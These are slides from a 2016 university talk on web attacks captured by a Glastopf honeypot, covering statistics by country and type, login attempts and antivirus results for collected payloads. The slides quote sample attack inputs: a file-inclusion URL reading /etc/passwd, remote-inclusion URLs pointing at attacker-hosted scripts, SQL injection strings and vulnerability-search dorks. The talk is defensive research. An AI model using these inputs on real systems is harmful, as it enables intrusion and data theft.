Web Attack Threat Analysis Experiences with Glastopf honeypot CAE Tech Talk – February 2016 Safwan Omari [email protected] Assistant professor of MIS College of Business - Lewis University

Outline • Honeypot • Deployment • Attack trends • Terminology • Attack results • Collected payloads

February 18, 2016

CAE Tech Talk

2

Honeypot – glastopf • Web-based vulnerabilities • Google dorks • inurl:”category.asp?catid=“ • Inurl:”content.asp?id=“

• Glastopf announces thousands of vulnerabilities

February 18, 2016

Dork type

Number

Grew to

inurl

3507

10,351

intext

189

same

intitle

346

same

CAE Tech Talk

3

Type of vulnerabilities Vulnerability

Possible attacks

Local File Inclusion Remote File Inclusion

-

SQLi

- Disclosure of sensitive information - Data corruption - Loss of data

February 18, 2016

code execution on the client-side such as JavaScript (XSS) code execution on the web server Sensitive Information Disclosure denial of Service (DoS)

CAE Tech Talk

4

Type of vulnerabilities cont’d -

XSS vulnerability via injection of JavaScript in CSS style sheet Disclosure of sensitive data Run JavaScript in victims browser Http session hijacking

PHPMyAdmin

-

phpMyAdmin is a web-based administration interface for MySQL databases Multiple vulnerabilities Execution of arbitrary commands Compromise of system

phpinfo

-

Php script that discloses server/php information Version of server OS WWW root directory Php Configuration information

Style CSS

February 18, 2016

CAE Tech Talk

5

Example- LFI • http://192.168.56.101/index.php?index=../../../../etc/passwd

February 18, 2016

CAE Tech Talk

6

Example - RFI • http://192.168.56.101/index.php?index=http://pastebin.com/raw.ph p?i=GK9m8dAL

February 18, 2016

CAE Tech Talk

7

Example - SQLi • http://192.168.56.101/index.php?id=22 SELECT database()

February 18, 2016

CAE Tech Talk

8

Example - SQLi • http://192.168.56.101/index.php?id=22 SELECT user()

February 18, 2016

CAE Tech Talk

9

Web application products • phpmyadmin • PHP enter • php-fusion module • Xerox docushare • Foafgen 0.3 • J-Pierre DEZELUS Les Visiteurs 2.0.1 • Many others (php-based and ASP-based)

February 18, 2016

CAE Tech Talk

10

Deployment • Comcast business class network, totally separate from University network • Given DNS names – www, smtp, financials • With little effort, attacker could easily tell it is a university network • Hackers with moderate experience should figure that it is a decoy system

February 18, 2016

CAE Tech Talk

11

Defending the honeypot • Attackers don’t play by the rules, they were trying to take over machine by launching brute force attacks against sshd • Logged in on a daily basis and monitor activity • Successful/bad login attempts • rootkit checks (rkhunter, rootkitchck)

• Fighting bots and backdoors • Monitor for all outgoing connections • Monitor open ports

February 18, 2016

CAE Tech Talk

12

Login attempts • 7143 login attempts originated from 125 unique IPs • From 25 countries – • HK (4714), CN (916), FR (506), VN (301)

• User names tried (account, alex, apache, backup, D-Link and many more) • root, 5648 • support 926 • admin 220

• One IP (43.229.x.x, HK) tried 4150 times • Rest – range from 1 to 524 • Average – 57 times, 24 times without HK attacker February 18, 2016

CAE Tech Talk

13

Terminology/metrics • Event – any http request • Attack • Set of events originating from same IP • Some attackers were determined, came back a few times • Had to consider time between events

• Length of an attack – time between first and last events • Number of events in an attack • Number of patterns in an attack (LFI, RFI, SQLi, etc)

February 18, 2016

CAE Tech Talk

14

Attack - examples • 202.67.X.X –attack (12 events)

• 2015-12-06 02:32:28 /view_faq.php?id=999999.9 or 1=1 • 2015-12-06 02:32:40 /view_faq.php?id=‘ • 2015-12-06 02:33:00 /view_faq.php?id= union all select null,null,null,null,null,null—

• 202.67.X.X – attack 2 (25 events)

• 2015-12-14 01:42:14 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct. asp?misc= • 2015-12-14 01:42:34 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct. asp?misc=9999 and 1=1 • 2015-12-14 01:42:39 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct. asp?misc='

February 18, 2016

CAE Tech Talk

15

Attack world map

Hawaiian Island Maldives

February 18, 2016

CAE Tech Talk

16

Attack trends 5000 400 300

events

attacks

4000

200

3000 2000

100

1000

0

0 0

10

20

30

40

0

day

February 18, 2016

10

20

30

40

day

CAE Tech Talk

17

Event types Type

February 18, 2016

Number

Percentage

Phpinfo

15

0%

RFI

65

0.1%

LFI

315

0.4%

XSS – CSS stylesheet

660

0.8%

Phpmyadmin

7894

9.9%

SQLi

42,572

53.3%

Unknown

27,071

35.4%

CAE Tech Talk

18

Attack events con’d • LFI • Attackers are after – (c:\boot.ini) and (/etc/passwd)

• RFI • http://u-braci.pl/components/com_user/Jubar.txt (Poland) • http://ropadeportiva.sexy/wp-includes/images/id.flv (Godaddy)

February 18, 2016

CAE Tech Talk

19

Top 10 countries - events France 5% Russia 2%

Other 8%

Morocco 6%

Brazil 3%

SG 2%

Turkey 2%

USA 30% Indonesia 39%

China 2%

KR 1%

February 18, 2016

CAE Tech Talk

20

Top 10 countries - attacks Other 27%

NL 2%

Russia 6%

Brazil 5%

China 12%

France 3% DE 2%

MA 2% Indonsia 15%

USA 24% UA 2%

February 18, 2016

CAE Tech Talk

21

Attack diversity 100% 90% 80% 70% 60% 50% 40% 30% 20% 10% 0% unknown

style_css

sqli

Brazil February 18, 2016

France

phpinfo

Moroco CAE Tech Talk

RFI

USA

LFI

phpmyadmin

Indonesia 22

Attack characteristics Country BR FR MA US ID RU CN February 18, 2016

avg. duration-min 1.0 0.5 3.7 0.4 3.6 0.6 3.5

avg. events/attack 16 39 74 31 66 7 5 CAE Tech Talk

total attacks 147 94 66 764 479 185 375 23

Attack characteristics cont’d • One event attacks • see home page and leave (20%)

• Time between events • events/seconds range from 0.0019 to 11.6

• Multiple attacks – • percentage of attackers who with multiple attacks(10%)

February 18, 2016

CAE Tech Talk

24

Time of attacks 70 60

Attacks

50 40 30 20 10 0 0

February 18, 2016

1

2

3

4

5

6

7

8

9

10

11 12 13 Hour of Day

CAE Tech Talk

14

15

16

17

18

19

20

21

22

23

25

Malware analysis • malwr • • • •

Free open malware analysis service based on Cuckoo Trace system calls (APIs) Captures and analyzes network traffic Memory analysis with Volatility

• virustotal • A free online service and subsidiary of Google • Runs multiple antivirus engines and aggregates results • AegisLab, Agnitum, Alibaba, Antiy-AVL, AVG, ClamAV, etc (54 engines)

February 18, 2016

CAE Tech Talk

26

Payloads MD5 Fingerprint

Size (bytes)

Date

Country

Malwr fingerprints

Virustotal hits

Payload-0f788

112350

2015-12-06

Newtown Square, USA

3

0/54

Payload-85a78

41155

2015-12-28

Samara, RU

0

13/54

Payload-214db

1116

2016-01-01

Bogotá, CO

1

35/54

Payload-432d0

112267

2015-12-13

NL

1

0/54

Payload-9162c

5794

2016-01-03

Lassance, BR

0

4/54

Payload-9860d

112302

2015-12-15

Zurich, CH

1

0/54

Payload-a38d2

95138

2015-12-10

Redwood City, US

3

0/52

February 18, 2016

CAE Tech Talk

27

Payload-0f788 • Malwr fingerprints • Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) • Installs itself for autorun at Windows startup

February 18, 2016

CAE Tech Talk

28

Payload-85a78 • Malwr did not detect any fingerprints • Virustotal – 13 hits/54

February 18, 2016

AegisLab

Script.Troj.Agent!c

AhnLab-V3

JS/SARS.S61

Avast

PHP:Agent-MN [Trj]

Bkav

CPRA349.Webshell

DrWeb

PHP.Siggen.16

ESET-NOD32

PHP/Obfuscated.E potentially unwanted

GData

Script.Trojan.Agent.MD5H0A

Ikarus

Backdoor.PHP.WebShell

NANO-Antivirus

Trojan.Html.Agent.bzzhwy

Qihoo-360

php.dkshell.0.116

Sophos

Troj/PhpShel-G

Symantec

PHP.Filesman

VBA32

suspected of Trojan.PHP.Obfuscated

CAE Tech Talk

29

Payload-214db • Malwr fingerprints • Installs itself for autorun at Windows startup

• Virustotal – 35 hits/54

February 18, 2016

ALYac, Ad-Aware, Arcabit, F-Secure, GData, MicroWorld-eScan, nProtect, Bitdefender AVG AegisLab, Antiy-AVL, Kaspersky Agnitum AhnLab-V3 Avast Avira Bkav CAT-QuickHeal ClamAV Comodo Cyren, F-Prot DrWeb ESET-NOD32 Emsisoft Ikarus Microsoft NANO-Antivirus Qihoo-360 Sophos Tencent TrendMicro, TrendMicro-HouseCall CAE Tech Talk VBA32 VIPRE

Backdoor.PHP.ALI PHP/BackDoor.AG Backdoor.PHP.PhpShell.bj!c PHP.ShellBot.M PHP/Shellexec PHP:Agent-RV [Trj] PHP/Shell.CA.2 VEX2650.Webshell HTML.BackDoor.A PHP.Shell-23 UnclassifiedMalware PHP/Small.D PHP.Shell.35 PHP/Small.NAL Backdoor.PHP.ALI (B) Backdoor.PHP.Agent Backdoor:PHP/Shell.C Trojan.Html.Zapchast.bubnpf Malware.Radar01.Gen Troj/PHPBdoor-A Php.Backdoor.Phpshell.Hnuz PHP_SHELL.GLT Backdoor.PHP.Rst.f Backdoor.PHP.C99shell.a (v)

30

Payload-432d0 • Malwr fingerprints • Installs itself for autorun at Windows startup

February 18, 2016

CAE Tech Talk

31

Payload-9162c • Malwr did not detect any fingerprints • Virustotal – 4 hits/54 AhnLab-V3 Avira NANO-Antivirus Qihoo-360

February 18, 2016

PHP/Massmailer PHP/MassMail.4127 Trojan.Html.Mailar.yrjmu php.script.mailsend.3

CAE Tech Talk

32

Payload-9860d • Malwr fingerprints • Installs itself for autorun at Windows startup

February 18, 2016

CAE Tech Talk

33

Payload-a38d2 • Malwr fingerprints • Installs itself for autorun at Windows startup • Performs some HTTP requests (Microsoft-WebDAVMiniRedir/5.1.2600, • Generates Some ICMP traffic

February 18, 2016

CAE Tech Talk

34

Future work • Looking closer into events • Possibility of correlating events – discovering bots • Possibility of fingerprinting tools

• Perform more detailed malware analysis of captured payloads • Change in attacks – pose as a • Bank • Clinic

February 18, 2016

CAE Tech Talk

35

Acknowledgment Swetha Rajshree – Graduate student for her contribution throughout this project

Faisal Abdullah (Chair) and Rami Khasawneh (Dean) for providing access to computing and network resources that made this work possible February 18, 2016

CAE Tech Talk

36